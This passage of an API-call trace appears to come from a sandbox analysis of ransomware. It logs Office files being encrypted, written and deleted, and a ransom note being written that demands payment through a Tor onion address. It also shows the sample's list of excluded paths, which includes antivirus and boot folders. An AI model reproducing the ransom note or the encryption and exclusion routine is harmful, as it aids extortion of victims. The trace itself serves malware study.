pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.428] GetLastError () returned 0x0 [0172.428] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.428] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.428] GetLastError () returned 0x0 [0172.428] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.428] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.428] GetLastError () returned 0x0 [0172.428] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.428] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0172.428] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.428] GetLastError () returned 0x0 [0172.428] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.428] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0xf0, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0xf0, lpOverlapped=0x0) returned 1 [0172.429] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0xf0, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0172.429] GetLastError () returned 0x0 [0172.429] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0172.429] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x0, lpOverlapped=0x0) returned 1 [0172.429] WriteFile (in: hFile=0x15c4, lpBuffer=0x2882ba0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x0, lpOverlapped=0x0) returned 1 [0172.429] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml")) returned 0x20 [0172.429] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML", dwFileAttributes=0x20) returned 1 [0172.429] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML") returned 1 [0172.429] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\SLERROR.XML" (normalized: "c:\\program files\\microsoft office\\office16\\slerror.xml")) returned 1 [0172.430] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0172.430] wcslen (_String="OK") returned 0x2 [0172.430] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.430] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.430] CryptDestroyKey (hKey=0x9ad578) returned 1 [0172.430] CryptDestroyHash (hHash=0x9ad738) returned 1 [0172.430] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0172.431] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0 [0172.431] GetLastError () returned 0x12 [0172.431] FindClose (in: hFindFile=0x9ad1b8 | out: hFindFile=0x9ad1b8) returned 1 [0172.431] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office16\\Recovers your files.html" (normalized: "c:\\program files\\microsoft office\\office16\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0172.431] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0172.432] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0172.432] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0172.432] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.432] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.432] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0172.432] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.432] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*.exe") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*.dll") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*.lnk") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*.bat") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*.ini") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*.msi") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*.scf") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*pagefile.sys*") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*NTUSER.DAT*") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*AppData*") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*\\winrar\\*") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*\\java\\*") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*\\windows\\*") returned 0 [0172.432] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*\\ESET\\*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*\\AVG\\*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*\\AVIRA\\*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*Atheros*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*Realtek*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*bootmgr*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*boot*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*boot*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*CONFIG.SYS*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*IO.SYS*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*MSDOS.SYS*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*NTDETECT.COM*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*ntldr*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*chrome*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*opera*") returned 0 [0172.433] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\*", pszSpec="*firefox*") returned 0 [0172.433] wcslen (_String="\\\\?\\") returned 0x4 [0172.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\*", lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 0x9ad7f8 [0172.668] wcscmp (_String1=".", _String2=".") returned 0 [0172.668] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0172.828] wcscmp (_String1="..", _String2=".") returned 1 [0172.829] wcscmp (_String1="..", _String2="..") returned 0 [0172.829] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7ed7c | out: lpFindFileData=0x2d7ed7c) returned 1 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*NMCRYPT") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*Recovers your files.html") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*.exe") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*.dll") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*.lnk") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*.bat") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*.ini") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*.msi") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*.scf") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*pagefile.sys*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*NTUSER.DAT*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*AppData*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*\\winrar\\*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*\\java\\*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*\\windows\\*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*\\ESET\\*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVG\\*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVIRA\\*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*Atheros*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*Realtek*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*bootmgr*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*CONFIG.SYS*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*IO.SYS*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*MSDOS.SYS*") returned 0 [0172.829] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*NTDETECT.COM*") returned 0 [0172.830] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*ntldr*") returned 0 [0172.830] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*chrome*") returned 0 [0172.830] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*opera*") returned 0 [0172.830] PathMatchSpecW (pszFile="AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*firefox*") returned 0 [0172.830] PathMatchSpecW (pszFile="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0000-1000-0000000FF1CE.xml", pszSpec="*") returned 1 [0172.830] strlen (_Str="NMoreira") returned 0x8 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.830] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.832] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.833] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7eb10 | out: pbBuffer=0x2d7eb10) returned 1 [0172.834] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 